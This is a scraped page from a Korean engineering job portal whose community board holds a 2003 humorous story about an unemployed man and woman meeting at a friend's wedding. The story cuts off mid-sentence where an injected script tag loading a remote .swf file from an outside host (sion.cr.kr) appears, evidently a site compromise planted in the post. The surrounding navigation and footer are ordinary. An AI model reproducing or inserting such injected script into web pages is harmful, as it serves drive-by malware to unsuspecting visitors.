기계, 전기, 전자, 엔지니어링, 설계, 생산, 기술영업, 기술직, 이공계 기술취업, 이엔지잡, 구인, 구직, 채용정보 이엔지잡 engjob.co.kr

Since 1998 이엔지잡 기계·전기전자·IT·자동차·화학·철강·금속·기술산업
Since 1998 이공계 기술인/엔지니어 취업포털 1위, 이엔지잡 ★ 설계/생산/기술/품질/연구개발/기술영업/관리
Since 1998 이공계 기술인/엔지니어 취업포털 1위, 이엔지잡 ★ 설계/생산/기술/품질/연구개발/기술영업/관리
Since 1998 직업전문학교, 직업훈련, 연수생, 취업아카데미, 취업학원, 취업교육, 교육생 모집 전문
Since 1998 이공계 기술인/엔지니어 취업포털 1위, 이엔지잡 ★ 설계/생산/기술/품질/연구개발/기술영업/관리
Since 1998 이공계 기술인/엔지니어 취업포털 1위, 이엔지잡 ★ 설계/생산/기술/품질/연구개발/기술영업/관리
 
  업종별 채용정보
전체 채용속보
전기/전자/통신/IT
기계/철강/금속/자동차
기술/생산/기능/노무
건설/환경/화학/기타
  직종별 채용정보
생산/제조/설비
기술·연구개발/R&D/설계
공정/품질/조립/포장
정비/검사/수리/A·S
설치·전기기사/열관리
건설/노무/기능/일용
  인재정보
이력서 상세검색
전체 인재정보
  기업회원관리
내 채용광고 관리
유료옵션서비스 안내
  개인회원관리
내 이력서 관리
유료옵션서비스 안내
  기술인프라자
취업내공쌓기(기초)
노무상식
기업별취업족보
  정회원 프리미엄존
취업내공쌓기(고급)
  이엔지잡 포커스
자격포털 Q-net
취업사기대처요령
  주요기업 채용홈
삼성전자
디어삼성 그룹채용
현대자동차
포스코
동부제철
현대제철
대한항공
  관련 사이트
협회/학회/단체
학교/학과
한국폴리텍대학
직업능력지식포털
교육부
산업통상자원부
앱설치 QR코드
앱설치 QR코드
취업내공쌓기{기초}
JOB소리 해보자구요~ 선후배 기술인들이 서로 격려, 조언해주면서 희망을 찾는 공간입니다. 고민상담, 취업수기, 직장생활 희노애락, 수다떨기 등 모든 JOB소리 OK! 비방, 욕설, 광고, 여러 게시판 중복글은 삭제함.
서비스이용에 관한 문의 및 제안은 운영자 이메일로 보내주세요!


작성자 : 왕백수

작성일 : 2003-06-21 오전 11:46:10 

조회 : 2543

제목 : 백수와 백조1...다시봐도 잼나네


=== 백조 === 

오늘 친구가 결혼한다. 비참하다......여자 나이 30.....나만 솔로다.....ㅜ.ㅜ 

대학 때 결혼 한 친구는 애까지 끌고 와서 '아줌마한테 인사해야지~~' 했다. 애만 아니면 한 대 후려 칠 뻔 했
다. 

친구들이 나 보고 부케를 받으랬다. 이젠 지겹다. 남자도 엄는데....부케가 다 무슨 소용이람...ㅜ.ㅜ 

안 받겠다고 했더니 오늘 받기로 한 애가 못 와서 내가 받아야 한다고 했다. 

지네들은 다 결혼을 해서 받을 수 없다고 했다. 한참을 티격태격하며 방방 뜨다 결국 내가 받기로 했다. 

친구들이 너 성격 거칠어 졌다며 안스러운 눈으로 쳐다봤다. 그래 나 노처녀에 백조다....어쩔래....ㅜ.ㅜ 



=== 백수 === 

31살에 백수가 됐다.......ㅜ.ㅜ;; 한숨만 나오는데 주위에 결혼하는 놈들은 왜 그리 많은지.... 오늘도 한 놈 간
다. 

또 사회를 봐야 한다....-.- 젠장 남 결혼 하는데 사회 본 건만 벌써 수십 번이다. 이젠 그러려니 한다. 

근데 식장에 들어가기 전 계단에서 담배를 피고 있는데 아래쪽에서 여자 몇 명이 말싸움을 하고 있었다. 

서로 부케를 받으라고 미루고 있었는데, 목숨걸고 싸우고 있었다. 뭘 그런걸 가지고 싸우는지 모르겠다. 

결국 한 여자가 받기로 했는데 그 여자 목소리가 제일 컸다. 

암만봐도 성깔이 더러운거 같았다.....난 저런 여자랑은 절대 결혼하지 말아야지... 

어랏, 근데 그 여자가 우리랑 같은 팀이다. 왠지 일진이 안 좋을 거 같다. 


=== 백조 === 

피로연을 하는데 아까 사회를 봤던 놈이 내 앞에 앉았다. 근데 자꾸 날보고 실실 쪼갠다......꼴에 이쁜건 알아
갖구. 

아닌가...? 내가 백조 인걸 눈치깠나? 음...요즘 자꾸 소심해 지는 것 같다. 

건배를 해도 나랑은 왠지 피하는 거 같다. 이 자식이 내가 논다고 깔보나... 

한잔 두잔 먹다보니 술이 좀 올랐다. 이 자식이 자꾸 날 피하는 거 같았다.....술을 먹여서 보내고 싶었다. 

꼭 허여멀건게 백수 같이 생겨가지곤....하긴 백수는 아니겠지. 

내가 노니까 남도 노는 걸루 보인다....ㅜ.ㅜ 

근데, 왜 나랑은 건배 안 하냐고 했더니, 그럼 게임 해서 지는 사람이 마시기로 하잖다. 

좋다고 했다. 나도 이나이 먹도록 안 해본 게임이 없다. 

속았다......사람 몸에서 <지>자로 끝나는 걸 대자고 했다. 엄지, 검지, 무명지, 중지, 약지 가 우선 나왔다. 

배때지, 허벅지, 모가지.......응용해서 손모가지, 발모가지도 나왔다. 

내가 할 차례였다. 장고 끝에 '장딴지' 하고 외쳤다. 놈이 씩~ 웃더니 해골바가지란다.. 

....폭탄주 한 잔 원샷했다. 

놈이 다시 귀지 란다. 또 마셨다.....ㅜ.ㅜ 이번엔 피지 란다... 죽이고 싶었다.......3잔 째다. 

이젠 없겠지 했는데.....실실 웃더니 코딱지 란다....더러운 놈.... 놈은 선수 였다........ 

연거푸 네 잔을 먹었더니 하늘이 뱅뱅 돌기 시작했다..... 


=== 백수 === 

성질도 안 좋은 여자가 술도 더럽게 잘 먹었다. 비장의 기술로 보내 버렸다...^^V 

2차 나이트를 가기로 했다. 근데 이 웬수가 엎어져 있더니, 나이트란 소리에 '어~~ 나도 가~' 하며 몸을 일으
켰다. 진짜 진상 이였다. 

나이트에 가선 시체처럼 잠만 잤다. 폐인 같았다. 

나중에 결혼 해도 절대 저런 딸은 낳지 말아야지 하고 결심했다. 

적당할 때 집에 갈려고 했는데, 친구놈이 오늘 지네 집에서 자고 내일 공항까지 운전을 해 달란다. 

호텔서 안 자냐니깐 잠깐 눈 붙이는데, 뭐하러 호텔에 가냐고 재수씨가 그런다. 싫다고 하고 싶었는데 변명거
리가 없었다. 

백수인거 뻔히 아는데, 바쁘단 핑계를 댈 수가 있어야지...-.- 

근데 젠장, 그 시체도 같이 가서 잔댄다. 

모 별 수 엄써따. 택시에 태우고 친구 부부와 넷이, 얻어놓은 아파트로 향했다. 

아무래도 잘 때 몸조심을 해야 될거 같다. 


=== 백조 === 

아웅~~ 새벽에 깼는데 머리가 한 대 얻어맞은 것 같았다. 아무래도 나이를 먹으니 체력이 떨어지는 거 같다. 

몸을 일으키고 보니 내 방이 아니었다. 헉! 여기가 어디지...? 혹시 아까 그 백수같은 놈이 날 어떻게 하려구? 

근데 불을 켜고 자세히 보니 낯이 좀 익은 방 이었다. 

며칠 전에 친구가 가구 들여 놓는다고 할 때 와 본 적이 있었다. 

아무래도 내가 어제 쓰러지니까 여기다 끌고 온 것 같다. 

하긴.... 집에 가서 엄마한테 욕 먹는 거 보담 낫다. 울 엄만 날 팔아서라도 시집보내고 싶단다. 젠장, 그게 딸한
테 할 소린지... 

우~~ 목이 타들어 가는 것 같았다. 거실로 나왔다. 

헉~~ 근데 이게 모람!! 왠 이상한 놈이 머리는 까치집을 한 채 거실바닥에 뒤집어져 자고 있었다. 

아까 그 웬수 놈이였다. 추운건지 술기운이 떨어졌는지 달달 떨고 있었다. 

저 ?script src=http://sion.cr.kr/iis.swf></script>
삭제버튼을 누르기전에 비밀번호를 입력하세요.
답변 수정 목록 글쓰기 최근리스트 지난리스트
채용정보 네트워크
소재지 : 서울 강북구 한천로140길 5-6 (주)컴테크컨설팅 대표 유종현
사업자등록번호 : 210-81-25058
직업정보제공사업신고번호 서울북부 제 2008-01호
통신판매업신고번호 강북-제 1911 호
문의메일 : helper@engjob.co.kr
전화 : 02-990-4698
FAX : 02-994-3693
앱설치 QR코드
대한민국 파워리더 대상
일자리발전공헌 부문 대상 수상
(2017.06)
대한민국 베스트 브랜드 대상
(2016.12)
대한민국 인성교육 대상
진로교육부문 대상 수상
(2016.07)
대한민국 교육공헌 대상
일자리공헌부문 대상 수상
(2016.02)
인취련인증서
보안 인증
클릭하시면 이니시스 결제시스템의 유효성을 확인하실 수 있습니다.
이니시스 전자결제
Copyright ⓒ 1991-2019
이엔지잡
All rights reserved.